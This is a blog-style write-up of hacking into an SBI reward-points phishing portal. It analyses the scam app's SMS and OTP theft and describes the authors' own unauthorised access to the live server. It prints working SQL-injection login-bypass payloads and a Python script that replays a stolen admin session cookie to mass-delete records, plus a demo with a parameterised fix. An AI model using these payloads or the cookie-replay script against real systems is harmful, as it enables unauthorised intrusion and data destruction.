Destroying the Scammers Portal — SBI Scam
Greetings to all readers,
Introduction to the Story
Last night one of my friends, Animesh, messaged me about yet another scam message he had received in the name of SBI Reward Points.
So we decided to look into this scam.
Upon checking the link, I found that the website asks victims to download and install an app in order to receive 5000 reward points on their card.
Exploitation
I installed the application on my test emulator and bypassed its SSL pinning so the traffic could be inspected.
Upon launching, the app asks the user for their credit card details along with personal details, supposedly to credit the reward points to their card.
On submitting the form, it sends all of these details to the attacker's server.
The application also requests SMS permission in order to run.
In the decompiled code one can see that the SMS messages on the phone are sent to /api/message.php and the form data is sent to /api/signup.php.
Upon checking these URLs, I found them vulnerable to SQL injection, but the injection lands in an INSERT query and no error is shown.
As the MySQL version was above 5.7 and the PHP back end did not support stacked queries, this made the API hard to exploit.
But after checking a few things on the domain I found an admin panel hosted on the same domain at /admin .
Surprisingly, the admin panel was vulnerable to SQL injection on its login page. Basic payloads like
' or 1=1 -- -
' or ''='
worked and I got access to the admin panel. The first payload comments out the rest of the query after an always-true condition; the second turns the password comparison into an always-true OR clause.
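As an added illustration (not code from this write-up or from the scam portal), the following Python shows why those two payloads work against a login that builds its SQL by string concatenation. An in-memory sqlite3 table with a constructed admin row stands in for the MySQL/PHP back end; the parameterised variant at the end shows the fix.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the panel's admin table (sqlite3 in memory, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # constructed credentials, not real ones
    db.execute("INSERT INTO admins (username, password) VALUES ('admin', 'hunter2')")
    db.commit()
    return db


def render_query(username, password):
    """Build the login query the way a string-concatenating PHP login does."""
    return ("SELECT id FROM admins WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    """Login as the scam panel did: user input pasted straight into SQL."""
    row = db.execute(render_query(username, password)).fetchone()
    return row is not None


def login_safe(db, username, password):
    """Same check with bound parameters: the quotes in the payload stay data."""
    row = db.execute(
        "SELECT id FROM admins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("' or 1=1 -- -", "whatever"), ("nobody", "' or ''='")]:
        print(render_query(user, pw))
        print("  vulnerable login:", login_vulnerable(db, user, pw))
        print("  parameterised:   ", login_safe(db, user, pw))
```

Printing the rendered query makes the mechanism visible: with the first payload everything after `1=1` is a comment, and with the second the trailing `or ''=''` is true regardless of the username, because AND binds tighter than OR. The `-- -` form matters on MySQL, which requires whitespace after `--` for a comment.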
Now I could see all the users being phished and all the SMS messages being logged in the portal.
The admin panel also had many SQLi-vulnerable URLs, so one could fetch anything from the database.
The database user had no root privileges, however, so I could not drop the database or delete any records that way.
The logged data includes name, email, card number, CVV, DOB, and expiry. When the scammers use a phished card, they also receive the SMS messages carrying the OTP, since the app forwards every message on the phone.
So, without any further user interaction, an attacker can read the OTP from the portal and complete the transaction easily.
Fortunately, the admin panel had an option to delete a logged record.
To delete all of them, I wrote a small Python script that sends that delete request, with the admin session cookie attached, for every record on the portal.
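The script below is an added example of that kind of cleanup script, not the author's script: it reuses the admin session cookie to list the logged records and replays the panel's own per-record delete request for each one. The cookie value and the /admin/users.php and /admin/delete.php?id= paths are hypothetical (the write-up does not name them), and a small constructed stand-in server with three fake record ids is included so the script runs offline.

```python
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Hypothetical values: the real cookie name, session value and admin URLs
# are not given in the write-up.
ADMIN_COOKIE = "PHPSESSID=0123456789abcdef"
LIST_PATH = "/admin/users.php"
DELETE_PATH = "/admin/delete.php?id="


def fetch_record_ids(base_url, cookie):
    """Load the record list as the logged-in admin and pull every delete link's id."""
    req = urllib.request.Request(base_url + LIST_PATH, headers={"Cookie": cookie})
    with urllib.request.urlopen(req) as resp:
        html = resp.read().decode("utf-8", "replace")
    return sorted({int(m) for m in re.findall(r"delete\.php\?id=(\d+)", html)})


def delete_records(base_url, cookie, ids):
    """Replay the panel's own delete request for each id; returns how many answered 200."""
    deleted = 0
    for rid in ids:
        req = urllib.request.Request(base_url + DELETE_PATH + str(rid),
                                     headers={"Cookie": cookie})
        with urllib.request.urlopen(req) as resp:
            if resp.status == 200:
                deleted += 1
    return deleted


def wipe_portal(base_url, cookie):
    """Loop until the list shows no ids we have not already sent a delete for.

    Re-fetching covers a panel that caps the list length; tracking `seen`
    guarantees termination even if a delete silently fails."""
    seen, total = set(), 0
    while True:
        ids = [i for i in fetch_record_ids(base_url, cookie) if i not in seen]
        if not ids:
            return total
        seen.update(ids)
        total += delete_records(base_url, cookie, ids)


class FakePortal(BaseHTTPRequestHandler):
    """Constructed stand-in for the scam panel so the script can run offline."""
    records = {101, 102, 103}  # constructed record ids, shared across requests

    def _reply(self, code, body=""):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        if self.headers.get("Cookie") != ADMIN_COOKIE:
            return self._reply(403, "login required")
        if self.path == LIST_PATH:
            links = "".join('<a href="delete.php?id=%d">delete</a>\n' % i
                            for i in sorted(self.records))
            return self._reply(200, "<html><body>%s</body></html>" % links)
        if self.path.startswith(DELETE_PATH):
            self.records.discard(int(self.path[len(DELETE_PATH):]))
            return self._reply(200, "deleted")
        return self._reply(404)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_portal():
    """Bind the stand-in on a free localhost port and serve it in the background."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakePortal)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


if __name__ == "__main__":
    server, base = start_fake_portal()
    print("deleted", wipe_portal(base, ADMIN_COOKIE), "records")
    server.shutdown()
```

Against a real panel the only pieces that change are the cookie and the two paths; the list-then-delete loop is the same. Scraping ids from the delete links rather than guessing a numeric range avoids hammering the server with requests for records that do not exist.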
Also, to prevent other users from being phished through the app, I abused the App Setting feature in the admin panel and set a warning message as a fake-app alert.
Anyone opening the app or the page now sees that warning instead of the reward form.
There were thousands of saved cards on the portal, all of which were deleted using the script mentioned above.
Conclusion
Do not install suspicious or untrusted apps.
Do not provide your information, such as personal details or card details, to any app.
Do not grant suspicious permissions to any app; here, the SMS read permission was being abused to fetch OTPs.
Credits
Animesh Roy (anir0y)
Shashwat Kumar(@rahullraz)